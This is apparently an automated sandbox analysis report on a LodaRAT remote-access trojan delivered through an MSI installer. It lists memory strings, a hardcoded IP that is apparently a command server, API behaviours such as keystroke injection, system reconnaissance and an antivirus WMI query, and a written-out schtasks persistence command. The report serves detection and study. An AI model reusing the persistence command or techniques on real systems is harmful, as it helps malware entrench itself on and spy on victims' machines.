              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <?6fgumemstr_c0cf13a4-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g5pz0qf5of4f9f~umemstr_fe07bf41-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o5lt2ex3ru1jmemstr_4dbfbd6d-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o5rv1cb2xmemstr_1d6b3f05-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g4uk9px8yb0wmemstr_beac4b0b-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p2oo1bl2ku5e6dz4iw9zh9umemstr_802d5d4b-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g7gh7dz8st3ymemstr_4532bf18-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8bkeysy9u0wegmemstr_fbd638fc-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p7zq9ti1ap9u1ezg;tmemstr_4a0ffc5f-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p2md2ql5imemstr_076c166b-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o0kq1py7ry1ememstr_ca7b6da6-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e2qg3kt9n8iw7qx8einfomemstr_36b68102-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu\software\win32cmemstr_1bc62176-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu\software\win32c gmemstr_53d3f911-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p3jc6tw8w7a|+ghtmemstr_f968e840-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p8xq5ty9u|2gctmemstr_1ffa985e-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu\software\win32|5gztmemstr_787bef8a-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p7zq9ti1ap9ucmemstr_d346312d-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p8xq5ty9ucmemstr_ccad72b0-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p3jc6tw8w9ucmemstr_1006d8d0-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p2bs1rp8a|memstr_857ab75d-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p3jc6tw8w2rocmemstr_245db1aa-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p3jc6tw8w_81|memstr_26a079b2-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p1gl3mf7acmemstr_acca9cf7-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|admin|x|user|win_81|memstr_fc0ae78a-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu\software\win32|memstr_7d525cb2-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p8ue5pa9y7acmemstr_b01029c7-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d172.111.138.100memstr_d348d81d-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p8xq5ty9uca@memstr_98366525-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p5pe2be0d21|h@memstr_5d033fc3-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: int tv_sec;int tv_usecs@memstr_69e57285-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p3jc6tw8w2|z@memstr_39503d3e-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p5pe2be0d2]@memstr_a033c4a8-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu\software\win32co@,wmemstr_f1807de7-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p2bs1rp8acv@'wmemstr_aafb164d-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1@fwmemstr_ae48ebce-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ka(v#memstr_1462fc00-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ra#v$memstr_aee46fbc-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ua:v%memstr_f078783b-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |a=v&memstr_a19f35d4-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *akv,memstr_10e8e6cc-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -abv-memstr_ef48181a-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4aev.memstr_225af4e6-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?a|v/memstr_2871a157-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301890l227301950l227301939l227302006l227301945l227301926l227301939l227301924l227301943l227301922l227301951l227301945l227301944l227302006l227301941l227301945l227301947l227301926l227301946l227301939l227301922l227301939l227301938l227302006l227301925l227301923l227301941l227301941l227301939l227301925l227301925l227301936l227301923l227301946l227301946l227301935l227302008l227302006zmemstr_0f4fa5f1-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301890l227301950l227301939l227302006l227301940l227301923l227301936l227301936l227301939l227301924l227302006l227301951l227301925l227302006l227301922l227301945l227301945l227302006l227301925l227301947l227301943l227301946l227301946l227302006l227301922l227301945l227302006l227301941l227301945l227301944l227301922l227301943l227301951l227301944l227302006l227301922l227301950l227301939l227302006l227301939l227301944l227301922l227301924l227301935l227302008227301memstr_077d9976-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301911l227301944l227302006l227301951l227301944l227301920l227301943l227301946l227301951l227301938l227302006l227301926l227301943l227301924l227301943l227301947l227301939l227301922l227301939l227301924l227302006l227301921l227301943l227301925l227302006l227301926l227301943l227301925l227301925l227301939l227301938l227302006l227301922l227301945l227302006l227301943l227302006l227301925l227301939l227301924l227301920l227301951l227301941l227301939l227302006l227301945l227301924l227302006l227301936l227301923l227301944l227301941l227301922l227301951l227301945l227301944l227302008xmemstr_bb97ce23-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301911l227301944l227302006l227301951l227301944l227301920l227301943l227301946l227301951l227301938l227302006l227301918l227301911l227301912l227301906l227301914l227301907l227302006l227301921l227301943l227301925l227302006l227301925l227301926l227301939l227301941l227301951l227301936l227301951l227301939l227301938l227302008zmemstr_fb393bd5-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301911l227301944l227302006l227301939l227301924l227301924l227301945l227301924l227302006l227301945l227301941l227301941l227301923l227301924l227301924l227301939l227301938l227302006l227301951l227301944l227302006l227301924l227301939l227301943l227301938l227301951l227301944l227301937l227302006l227301945l227301924l227302006l227301921l227301924l227301951l227301922l227301951l227301944l227301937l227302006l227301938l227301943l227301922l227301943l22730200801926l-memstr_7bebea51-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{172bddf8-ceea-11d1-8b05-00600806d9b6}memstr_226d158c-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301912l227301945l227301922l227302006l227301939l227301944l227301945l227301923l227301937l227301950l227302006l227301920l227301951l227301924l227301922l227301923l227301943l227301946l227302006l227301947l227301939l227301947l227301945l227301924l227301935l227302006l227301945l227301924l227302006l227301926l227301943l227301937l227301951l227301944l227301937l227302006l227301936l227301951l227301946l227301939l227302006l227301927l227301923l227301945l227301922l227301943l227302006l227301951l227301925l227302006l227301943l227301920l227301943l227301951l227301946l227301943l227301940l227301946l227301939l227302006l227301922l227301945l227302006l227301941l227301945l227301947l227301926l227301946l227301939l227301922l227301939l227302006l227301922l227301950l227301939l227302006l227301925l227301926l227301939l227301941l227301951l227301936l227301951l227301939l227301938l227302006l227301945l227301926l227301939l227301924l227301943l227301922l227301951l227301945l227301944l227302008dmemstr_e82c886a-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301911l227301944l227302006l227301951l227301944l227301920l227301943l227301946l227301951l227301938l227302006l227301936l227301946l227301943l227301937l227302006l227301921l227301943l227301925l227302006l227301926l227301943l227301925l227301925l227301939l227301938l227302006l227301922l227301945l227302006l227301922l227301950l227301939l227302006l227301936l227301923l227301944l227301941l227301922l227301951l227301945l227301944l22730200822dmemstr_6f1bf62c-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301908l227301943l227301938l227302006l227301938l227301943l227301922l227301943l227302006l227301925l227301923l227301926l227301926l227301946l227301951l227301939l227301938l227302006l227301922l227301945l227302006l227301936l227301923l227301944l227301941l227301922l227301951l227301945l227301944l227302008937lmemstr_80751837-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301890l227301950l227301939l227302006l227301941l227301945l227301947l227301926l227301923l227301922l227301939l227301938l227302006l227301943l227301923l227301922l227301950l227301939l227301944l227301922l227301951l227301941l227301943l227301922l227301951l227301945l227301944l227302006l227301922l227301943l227301937l227302006l227301938l227301951l227301938l227302006l227301944l227301945l227301922l227302006l227301947l227301943l227301922l227301941l227301950l227302006l227301922l227301950l227301939l227302006l227301951l227301944l227301926l227301923l227301922l227302006l227301943l227301923l227301922l227301950l227301939l227301944l227301922l227301951l227301941l227301943l227301922l227301951l227301945l227301944l227302006l227301922l227301943l227301937l2273020083memstr_5bc885b3-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 939l227302008l227302memstr_66cf7583-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 02006l227302014l227302003l227301902l22730201522fmemstr_078050d3-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301891l227301944l227301924l227301939l227301941l227301945l227301937l227301944l227301951l227301932l227301939l227301938l227302006l227301925l227301922l227301943l227301922l227301923l227301925l227302006l227301941l227301945l227301938l227301939l227302008l227302006l227302006l227302014l227302003l227301902l227302015memstr_db295865-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2.4.5.0gxkymemstr_ce28ccc6-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bxvy memstr_ff7a85e7-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: axuy!memstr_42d5ea46-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2.4.6.0memstr_d4c46e0d-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cywxkmemstr_14a06c07-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fyjxlmemstr_f269e9b9-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eyixmmemstr_70e3925a-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hylxnmemstr_3ffcc976-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: oycxomemstr_7acd8d30-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ryfxpmemstr_f0087198-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qyexqmemstr_36b6e592-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tyxxrmemstr_4fe5dca4-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [y_xsmemstr_8182cabf-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^yrxtmemstr_4749d386-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]yqxumemstr_6c273dee-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `ytxvmemstr_005e642e-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: win_81memstr_e13904b1-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: desktopmemstr_94610267-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ncalrpcx[\zmemstr_1ea4f68a-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b[vz memstr_7c401b2c-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a[uz!memstr_6ab5e844-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ctw]kmemstr_a392ad3f-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ftj]lmemstr_9de3826c-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eti]mmemstr_5bf5824a-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: htl]nmemstr_0822e63b-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: otc]omemstr_3b6cddb0-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rtf]pmemstr_553228d5-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qte]qmemstr_3b1f6281-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ttx]rmemstr_23fd1b61-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [t_]smemstr_e7d1ca3b-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^tr]tmemstr_97bc198c-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]tq]umemstr_470424e9-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `tt]vmemstr_ca7e170b-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd.exememstr_5cfd47af-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startupmemstr_42146ca6-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startupmemstr_d1044278-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu\somemstr_12c71a06-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bvv_ memstr_2171fc68-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avu_!memstr_bd8fd810-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sracmbmemstr_497c2f76-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /q.lnkmemstr_4c4128c4-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: enabxmemstr_556f5274-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wparammemstr_aa3b863e-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 849224memstr_bab619b2-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lparammemstr_9873cd87-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cww^kmemstr_938c239a-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fwj^lmemstr_b3421c61-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ewi^mmemstr_1f8522ee-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hwl^nmemstr_87e5b4de-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: owc^omemstr_ce21ae0a-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rwf^pmemstr_4c14531f-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qwe^qmemstr_1f29ff96-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lresulttwx^rmemstr_4b13f9c5-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [w_^smemstr_0b3a3fbf-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^wr^tmemstr_f00f9a0c-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]wq^umemstr_e361c225-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `wt^vmemstr_e8b21858-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 849224gwmemstr_cf1e3f31-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7852hmemstr_e5c953f7-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: musicmemstr_057b9744-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: profilememstr_84b93448-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: videosmemstr_4499c040-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: common!pmemstr_63e4a6e5-5
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00364B52 SendInput,keybd_event,3_2_00364B52
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00367DD5 mouse_event,3_2_00367DD5
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1Jump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0035B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,3_2_0035B398
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0035BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,3_2_0035BE31
              Source: MSI4976.tmp, SRACMB.exeBinary or memory string: Shell_TrayWnd
              Source: MSI4976.tmp, 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp, SRACMB.exe, 00000008.00000002.1427524418.000000000015E000.00000040.00000001.01000000.00000007.sdmp, SRACMB.exe, 00000009.00000002.1495148976.000000000015E000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00347254 cpuid 3_2_00347254
              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_003440DA GetSystemTimeAsFileTime,__aulldiv,3_2_003440DA
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0039C146 GetUserNameW,3_2_0039C146
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00352C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,3_2_00352C3C
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0033E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_0033E47B
              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: MSI4976.tmp, 00000003.00000002.2615051893.0000000001822000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\Installer\MSI4976.tmpWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LodaRAT
              Source: Yara matchFile source: Process Memory Space: MSI4976.tmp PID: 7764, type: MEMORYSTR
              Source: MSI4976.tmp, 00000003.00000002.2616628819.0000000004A1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|192.168.2.9|ddd|Pr1024X21280X3|Desktop|0|beta27301924L227301945L227301924e
              Source: MSI4976.tmp, 00000003.00000002.2615051893.0000000001822000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|ograms
              Source: SRACMB.exe, 00000012.00000002.2301030443.000000000015E000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
              Source: SRACMB.exe, 00000012.00000003.2281901155.000000000495F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
              Source: MSI4976.tmp, 00000003.00000002.2615051893.0000000001822000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|xe
              Source: SRACMB.exeBinary or memory string: WIN_XP
              Source: MSI4976.tmp, 00000003.00000002.2615051893.0000000001822000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|Admin|x|user|WIN_81|X64| |Windows Defender|-383053
              Source: SRACMB.exe, 0000000D.00000003.1563336074.00000000047F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81|
